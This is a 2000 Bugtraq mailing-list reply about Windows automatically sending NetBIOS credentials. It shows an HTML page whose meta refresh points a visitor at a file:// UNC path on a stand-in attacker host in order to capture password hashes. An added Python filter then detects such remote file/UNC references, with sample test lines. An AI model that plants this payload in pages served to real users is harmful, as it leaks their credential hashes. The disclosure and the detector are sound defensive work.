Bugtraq mailing list archives
Re: Win2k Telnet.exe malicious server vulnerability
From: Рягин Михаил Юрьевич <ryagin () EXTRIM RU>
Date: Fri, 15 Sep 2000 10:59:26 +0600
The problem is far more general than a single poor configuration default in telnet.exe. The main problem is that Windows automatically supplies user credentials in many situations without ever asking for the user's opinion. For example, the following html file:

  <html><head>
  <meta http-equiv="refresh" content="5;URL=file://\\www.hackers_site.com\test.txt">
  </head>
  <body>
  You will be hacked within 5 seconds...
  </body>
  </html>

will automatically connect to the evil site through NetBIOS and supply the user's password hashes. Putting the malicious site into the 'Restricted Zone' doesn't help.
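Added example, not part of the original post: a Python filter that a mail or web gateway could run over HTML to flag references such as the meta refresh above, where a file: URL or bare UNC path names a remote host. The function names, the attribute list and every sample line except the post's own meta tag are assumptions made for illustration.

```python
import re
from html.parser import HTMLParser

URL_ATTRS = {"src", "href", "background", "data", "action"}  # assumed attribute set

def remote_host(url):
    """Return the host a file:/UNC reference would contact, or None if local."""
    raw = url.strip()
    u = raw.replace("\\", "/")
    if u.lower().startswith("file:"):
        rest = u[5:]
        slashes = len(rest) - len(rest.lstrip("/"))
        # file://host/... and file:////host/... are remote; file:///C:/x is local.
        if slashes != 2 and slashes < 4:
            return None
        host = rest.lstrip("/").split("/", 1)[0]
    elif raw.startswith("\\\\"):
        host = u[2:].split("/", 1)[0]  # bare \\host\share
    else:
        return None  # http(s), protocol-relative //host, relative paths
    if not host or host.lower() == "localhost" or re.fullmatch(r"[A-Za-z][:|]", host):
        return None
    return host

class UncRefFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hits = []  # (tag, attribute, host)

    def handle_starttag(self, tag, attrs):
        a = {k: v for k, v in attrs if v}
        cands = [(k, v) for k, v in a.items() if k in URL_ATTRS]
        if tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # content looks like "5;URL=<target>"
            target = a.get("content", "").partition(";")[2].strip()
            if target.lower().startswith("url"):
                target = target.partition("=")[2].strip(" '\"")
            cands.append(("refresh", target))
        for attr, url in cands:
            if (host := remote_host(url)):
                self.hits.append((tag, attr, host))

def find_unc_refs(html):
    finder = UncRefFinder()
    finder.feed(html)
    return finder.hits

# First tag is the post's own snippet; the other three are constructed test cases.
SAMPLE = r'''<meta http-equiv="refresh" content="5;URL=file://\\www.hackers_site.com\test.txt">
<img src="\\fileserver.example\share\logo.gif">
<a href="file:///C:/docs/readme.txt">local</a>
<a href="//cdn.example/app.js">protocol-relative</a>'''
```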
Current thread:
- Win2k Telnet.exe malicious server vulnerability monti (Sep 13)
- Re: Win2k Telnet.exe malicious server vulnerability Jim Paris (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Micah Webner (Sep 14)
- <Possible follow-ups>
- Re: Win2k Telnet.exe malicious server vulnerability Microsoft Security Response Center (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability monti (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Microsoft Security Response Center (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Tim Hollebeek (Sep 14)
- Re: Win2k Telnet.exe malicious server vulnerability Blue Boar (Sep 15)
- Re: Win2k Telnet.exe malicious server vulnerability Рягин Михаил Юрьевич (Sep 15)
- Re: Win2k Telnet.exe malicious server vulnerability Bronek Kozicki (Sep 17)
- Re: Win2k Telnet.exe malicious server vulnerability J Edgar Hoover (Sep 18)
- Re: Win2k Telnet.exe malicious server vulnerability Bronek Kozicki (Sep 17)